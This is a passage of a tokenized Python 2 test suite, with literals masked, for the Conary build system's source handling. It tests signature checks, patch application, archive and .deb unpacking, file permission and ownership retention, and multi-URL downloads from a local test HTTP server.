) , '<STR_LIT>' ) ) <EOL> return openpgpfile . parseAsciiArmorKey ( f ) <EOL> raise source . SourceError ( "<STR_LIT>" % slf . keyid ) <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> mockedDownloadPublicKey ) <EOL> util . rmtree ( self . buildDir , ignore_errors = True ) <EOL> self . resetWork ( ) <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) ) <EOL> recipestr2 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr2 , <EOL> "<STR_LIT>" ) <EOL> def testSourceTestSigCheckFailedDownload ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> from conary . repository import transport <EOL> listcounter = [ ] <EOL> def mockedDoDownloadPublicKey ( slf , keyServer , lc = listcounter ) : <EOL> lc . 
append ( None ) <EOL> if len ( lc ) < <NUM_LIT:7> : <EOL> raise transport . TransportError ( "<STR_LIT>" ) <EOL> f = file ( os . path . join ( resources . get_archive ( ) , '<STR_LIT>' ) ) <EOL> data = openpgpfile . parseAsciiArmorKey ( f ) <EOL> return data <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> mockedDoDownloadPublicKey ) <EOL> util . rmtree ( self . buildDir , ignore_errors = True ) <EOL> self . resetWork ( ) <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" , prep = True ) <EOL> self . logFilter . remove ( ) <EOL> self . assertEqual ( len ( listcounter ) , <NUM_LIT:7> ) <EOL> def testDontCheckKeyOfCommitedSource ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> listcounter = [ ] <EOL> def _checkSignature ( self , file ) : <EOL> listcounter . append ( None ) <EOL> return <EOL> self . mock ( source . _Source , '<STR_LIT>' , <EOL> _checkSignature ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr1 ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> assert ( listcounter ) <EOL> listcounter [ : ] = [ ] <EOL> assert ( not listcounter ) <EOL> self . cookItem ( self . openRepository ( ) , self . cfg , '<STR_LIT>' , requireCleanSources = True ) <EOL> assert ( not listcounter ) <EOL> def testSourceTestApplyMacros ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> def testSourceApplyMacros2 ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> rv = self . findInFile ( util . joinPaths ( self . 
buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , self . cfg . buildPath + '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> rv = self . findInFile ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> assert ( rv != - <NUM_LIT:1> ) <EOL> assert ( os . stat ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) ) [ stat . ST_MODE ] & <NUM_LIT:0> <NUM_LIT> == <NUM_LIT:0> <NUM_LIT> ) <EOL> def testPatchFilter ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr , <EOL> '<STR_LIT>' ) <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , '<STR_LIT>' ) <EOL> def testAction ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> os . stat ( util . joinPaths ( self . buildDir , '<STR_LIT>' ) ) <EOL> def findInFile ( self , filename , key ) : <EOL> f = open ( filename ) <EOL> contents = f . read ( ) <EOL> return contents . find ( key ) <EOL> def testAutoSourcePermissions ( self ) : <EOL> permsRecipe = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:test>' ) <EOL> os . chdir ( '<STR_LIT:test>' ) <EOL> self . writeFile ( '<STR_LIT>' , permsRecipe ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> shutil . rmtree ( '<STR_LIT:test>' ) <EOL> os . chdir ( origDir ) <EOL> self . resetCache ( ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT:test>' , requireCleanSources = False ) <EOL> def testAutoMainDir ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> ( built , d ) = self . 
buildRecipe ( recipestr1 , "<STR_LIT>" ) <EOL> recipestr2 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr2 , "<STR_LIT>" ) <EOL> recipestr3 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr3 , "<STR_LIT>" ) <EOL> recipestr4 = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr4 , "<STR_LIT>" ) <EOL> def testAutoMainDirGuessFailure ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . buildRecipe , recipestr , <EOL> "<STR_LIT>" ) <EOL> def testSourceMagic ( self ) : <EOL> d = tempfile . mkdtemp ( ) <EOL> try : <EOL> shutil . copyfile ( resources . get_archive ( ) + '<STR_LIT>' , <EOL> d + '<STR_LIT>' ) <EOL> self . cfg . sourceSearchDir = d <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' ) <EOL> a . doAction ( ) <EOL> assert ( os . path . isdir ( r . macros . builddir + '<STR_LIT>' ) ) <EOL> assert ( os . path . isfile ( r . macros . builddir + '<STR_LIT>' ) ) <EOL> finally : <EOL> shutil . rmtree ( d ) <EOL> def testAddBadPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:0> ] . __class__ != source . SourceError : <EOL> self . fail ( '<STR_LIT>' ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . 
fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodLevel0Patch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> def testAddGoodButRejectedPatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> msg = '<STR_LIT:\n>' . join ( x for x in self . logFilter . records if '<STR_LIT>' in x ) <EOL> expected = """<STR_LIT>""" <EOL> msg = msg . replace ( self . buildDir , '<STR_LIT>' ) <EOL> msg = msg . replace ( self . sourceSearchDir , '<STR_LIT>' ) <EOL> self . assertEqual ( msg , expected ) <EOL> if rc [ <NUM_LIT:1> ] : <EOL> self . 
fail ( '<STR_LIT>' % rc [ <NUM_LIT:1> ] ) <EOL> assert ( os . path . exists ( self . buildDir + '<STR_LIT>' ) ) <EOL> def testAddPartiallyApplicablePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> _returnException = True , logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> assert ( '<STR_LIT>' not in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> def testPatchSameFileTwiceInOnePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> self . logFilter . remove ( ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> recipestr1 = recipestr1 . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> shutil . rmtree ( self . buildDir + '<STR_LIT>' ) <EOL> rc = self . captureOutput ( self . buildRecipe , recipestr1 , "<STR_LIT>" , <EOL> logLevel = log . INFO ) <EOL> assert ( '<STR_LIT>' in open ( self . buildDir + '<STR_LIT>' ) . read ( ) ) <EOL> def testLargePatch ( self ) : <EOL> recipestr1 = """<STR_LIT>""" <EOL> self . assertRaises ( source . SourceError , self . captureOutput , <EOL> self . buildRecipe , <EOL> recipestr1 , "<STR_LIT>" ) <EOL> def testMissingPatchProgram ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> self . assertRaises ( source . SourceError , <EOL> self . buildRecipe , recipestr , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( [ <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def testTarPermissions ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . 
Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> sb = os . stat ( r . macros . destdir + '<STR_LIT>' ) <EOL> assert ( sb . st_mode & stat . S_IWGRP ) <EOL> def testDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> self . assertTrue ( os . path . islink ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testBzipDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testLZMADeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testBzipDebControl ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . Archive ( r , '<STR_LIT>' , debArchive = '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> a . doAction ( ) <EOL> self . assertTrue ( os . path . isfile ( r . macros . destdir + '<STR_LIT>' ) ) <EOL> def testEmptyDeb ( self ) : <EOL> r = policytest . DummyRecipe ( self . cfg ) <EOL> os . mkdir ( '<STR_LIT:/>' . join ( ( r . macros . builddir , r . theMainDir ) ) ) <EOL> a = source . 
Archive ( r , '<STR_LIT>' , dir = '<STR_LIT:/>' ) <EOL> self . assertRaises ( source . SourceError , a . doAction ) <EOL> def testAllPermissionsRetention ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvInfo = ( built [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , VFS ( built [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) , built [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] ) <EOL> repos = self . openRepository ( ) <EOL> cs = repos . createChangeSet ( <EOL> [ ( trvInfo [ <NUM_LIT:0> ] , ( None , None ) , ( trvInfo [ <NUM_LIT:1> ] , trvInfo [ <NUM_LIT:2> ] ) , True ) ] ) <EOL> trvCs = cs . getNewTroveVersion ( * trvInfo ) <EOL> trv = trovemod . Trove ( trvCs ) <EOL> actual = { } <EOL> for pathId , path , fileId , version in trv . iterFileList ( ) : <EOL> stream = cs . getFileChange ( None , fileId ) <EOL> fObj = files . ThawFile ( stream , pathId ) <EOL> actual [ path ] = ( fObj . inode . owner ( ) , <EOL> fObj . inode . group ( ) , <EOL> fObj . inode . permsString ( ) ) <EOL> expected = { <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> ( '<STR_LIT:root>' , '<STR_LIT:root>' , '<STR_LIT>' ) , <EOL> } <EOL> if actual != expected : <EOL> l = [ ] <EOL> extra = sorted ( list ( set ( actual . keys ( ) ) - set ( expected . keys ( ) ) ) ) <EOL> for m in extra : <EOL> l . 
append ( '<STR_LIT>' % m ) <EOL> for path in actual . keys ( ) : <EOL> if path in expected and actual [ path ] != expected [ path ] : <EOL> l . append ( '<STR_LIT>' <EOL> % ( ( path , ) + expected [ path ] + actual [ path ] ) ) <EOL> missing = sorted ( list ( set ( expected . keys ( ) ) - set ( actual . keys ( ) ) ) ) <EOL> for m in missing : <EOL> l . append ( '<STR_LIT>' % m ) <EOL> msg = '<STR_LIT:\n>' . join ( l ) <EOL> self . fail ( msg ) <EOL> def testOwnershipRetention ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvInfo = ( built [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , VFS ( built [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) , built [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] ) <EOL> repos = self . openRepository ( ) <EOL> cs = repos . createChangeSet ( <EOL> [ ( trvInfo [ <NUM_LIT:0> ] , ( None , None ) , ( trvInfo [ <NUM_LIT:1> ] , trvInfo [ <NUM_LIT:2> ] ) , True ) ] ) <EOL> trvCs = cs . getNewTroveVersion ( * trvInfo ) <EOL> trv = trovemod . Trove ( trvCs ) <EOL> actual = { } <EOL> for pathId , path , fileId , version in trv . iterFileList ( ) : <EOL> stream = cs . getFileChange ( None , fileId ) <EOL> fObj = files . ThawFile ( stream , pathId ) <EOL> actual [ path ] = ( fObj . inode . owner ( ) , fObj . inode . 
group ( ) ) <EOL> expected = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> if actual != expected : <EOL> l = [ ] <EOL> for path in actual . keys ( ) : <EOL> if actual [ path ] != expected [ path ] : <EOL> l . append ( '<STR_LIT>' <EOL> % ( ( path , ) + expected [ path ] + actual [ path ] ) ) <EOL> msg = '<STR_LIT:\n>' . join ( l ) <EOL> self . fail ( msg ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . 
SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testSourceLzop ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> built = self . buildRecipe ( recipestr , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert built <EOL> class TestBadaddSource ( rephelp . RepositoryHelper ) : <EOL> def testBadaddSource ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except source . SourceError , e : <EOL> assert ( str ( e ) == '<STR_LIT>' ) <EOL> else : <EOL> assert ( False ) <EOL> def testAddSourceDir ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> class Stop ( Exception ) : <EOL> pass <EOL> def mockDoDownload ( x ) : <EOL> f = x . _findSource ( x . httpHeaders ) <EOL> self . assertEquals ( f , os . path . join ( x . builddir , <EOL> x . recipe . macros . maindir , <EOL> '<STR_LIT:test>' ) ) <EOL> raise Stop <EOL> def mockFindAll ( * args , ** kwargs ) : <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> self . mock ( source . addSource , '<STR_LIT>' , mockDoDownload ) <EOL> self . mock ( lookaside , '<STR_LIT>' , mockFindAll ) <EOL> self . assertRaises ( Stop , self . buildRecipe , <EOL> recipeStr , "<STR_LIT>" ) <EOL> def testAddMaindirPatch ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> def testAddPatchGlob ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> def testAddPatchBadGlob ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> try : <EOL> self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> except OSError , e : <EOL> if e . errno != <NUM_LIT:2> : <EOL> raise <EOL> self . assertEquals ( str ( e ) , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def testAddPatchSortOrder ( self ) : <EOL> class TestAddPatch ( source . 
addPatch ) : <EOL> sourceDir = '<STR_LIT:.>' <EOL> def __init__ ( x ) : <EOL> pass <EOL> def _findSource ( x , httpArgs = { } , braceGlob = False ) : <EOL> return [ "<STR_LIT:3>" , "<STR_LIT:2>" , "<STR_LIT:1>" ] <EOL> _checkSignature = lambda * args , ** kwargs : None <EOL> def doFile ( x , path ) : <EOL> self . orderedCalls . append ( path ) <EOL> self . orderedCalls = [ ] <EOL> addPatch = TestAddPatch ( ) <EOL> addPatch . do ( ) <EOL> self . assertEquals ( self . orderedCalls , [ "<STR_LIT:1>" , "<STR_LIT:2>" , "<STR_LIT:3>" ] ) <EOL> def _getHTTPServer ( self , logFile ) : <EOL> class FileHandler ( SimpleHTTPServer . SimpleHTTPRequestHandler ) : <EOL> count = <NUM_LIT:0> <EOL> def log_message ( slf , * args , ** kw ) : <EOL> file ( logFile , "<STR_LIT:a>" ) . write ( "<STR_LIT>" % slf . path ) <EOL> def do_GET ( slf ) : <EOL> if slf . path . endswith ( '<STR_LIT>' ) : <EOL> contentType = '<STR_LIT>' <EOL> archpath = self . workDir + '<STR_LIT>' <EOL> FileHandler . count += <NUM_LIT:1> <EOL> open ( archpath , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % slf . count ) <EOL> elif ( slf . path . startswith ( "<STR_LIT>" ) or <EOL> not slf . path . endswith ( '<STR_LIT>' ) ) : <EOL> slf . send_response ( <NUM_LIT> ) <EOL> slf . end_headers ( ) <EOL> return <EOL> elif slf . path . endswith ( '<STR_LIT>' ) : <EOL> archpath = os . path . join ( resources . get_archive ( ) , "<STR_LIT>" ) <EOL> contentType = "<STR_LIT>" <EOL> else : <EOL> archpath = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> file ( archpath , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> contentType = '<STR_LIT>' <EOL> fileSize = os . stat ( archpath ) . st_size <EOL> slf . send_response ( <NUM_LIT:200> ) <EOL> slf . send_header ( "<STR_LIT:Content-Type>" , contentType ) <EOL> slf . send_header ( "<STR_LIT>" , fileSize ) <EOL> slf . end_headers ( ) <EOL> util . copyStream ( open ( archpath ) , slf . wfile ) <EOL> hs = rephelp . 
HTTPServerController ( FileHandler ) <EOL> return hs <EOL> def testAddArchiveMultiURL ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> recipestrSrc = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> trv = self . build ( recipestr % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> recipestr2 = recipestr . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> trv = self . build ( recipestr2 % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> recipestr3 = recipestr2 . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> err = self . assertRaises ( errors . CookError , <EOL> self . build , recipestr3 % dict ( port = hs . port ) , "<STR_LIT>" ) <EOL> strerr = str ( err ) <EOL> strerr = strerr [ strerr . find ( '<STR_LIT>' ) : ] <EOL> self . assertEqual ( strerr , <EOL> "<STR_LIT>" ) <EOL> recipeData = recipestrSrc % dict ( port = hs . port ) <EOL> trv = self . build ( recipeData , "<STR_LIT>" ) <EOL> self . assertEqual ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] , <EOL> [ '<STR_LIT>' ] ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> open ( "<STR_LIT>" , "<STR_LIT:w>" ) . write ( recipeData ) <EOL> self . commit ( ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testAddArchivePassword ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr % dict ( port = hs . port ) ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> self . refresh ( ) <EOL> self . 
commit ( ) <EOL> xx = self . cookItem ( self . openRepository ( ) , self . cfg , '<STR_LIT:foo>' ) <EOL> self . updatePkg ( '<STR_LIT:foo>' ) <EOL> self . assertEquals ( open ( self . cfg . root + '<STR_LIT>' ) . read ( ) , '<STR_LIT>' ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testMultiURLMirror ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> mirrorsDir = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> util . mkdirChain ( mirrorsDir ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> self . cfg . mirrorDirs = [ mirrorsDir ] <EOL> try : <EOL> trv = self . build ( recipestr % dict ( rest = '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> self . assertEqual ( lines [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> badUrls = set ( '<STR_LIT:/>' . join ( x . split ( '<STR_LIT:/>' ) [ : 